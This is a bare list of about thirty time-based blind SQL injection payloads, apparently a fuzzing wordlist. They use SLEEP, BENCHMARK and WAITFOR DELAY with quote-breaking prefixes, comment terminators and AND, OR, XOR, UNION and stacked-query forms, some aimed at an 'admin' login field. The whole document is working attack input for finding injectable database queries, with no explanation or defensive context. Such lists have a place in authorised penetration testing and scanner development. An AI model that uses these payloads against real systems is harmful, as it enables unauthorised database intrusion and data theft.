' AND SLEEP(5)--
' AND SLEEP(5)#
' AND SLEEP(5) AND '1'='1
' AND (SELECT SLEEP(5))--
' AND (SELECT SLEEP(5))#
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--
' AND SLEEP(5)='1
' AND BENCHMARK(1000000,MD5(1))--
' AND BENCHMARK(5000000,MD5(1))--
' AND BENCHMARK(5000000,SHA1(1))--
' AND BENCHMARK(10000000,MD5(1))--
' OR SLEEP(5)--
' OR SLEEP(5)#
' OR SLEEP(5) AND '1'='1
' OR (SELECT SLEEP(5))--
' OR (SELECT * FROM (SELECT(SLEEP(5)))a)--
' XOR SLEEP(5)--
' XOR (SELECT SLEEP(5))--
'; SELECT SLEEP(5)--
'; SELECT SLEEP(5)#
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'#
'; WAITFOR DELAY '0:0:5'--
1' AND SLEEP(5)--
1' AND SLEEP(5)#
admin' AND SLEEP(5)--
admin' AND (SELECT SLEEP(5))--
' UNION SELECT SLEEP(5)--
' UNION SELECT 1,SLEEP(5),3--
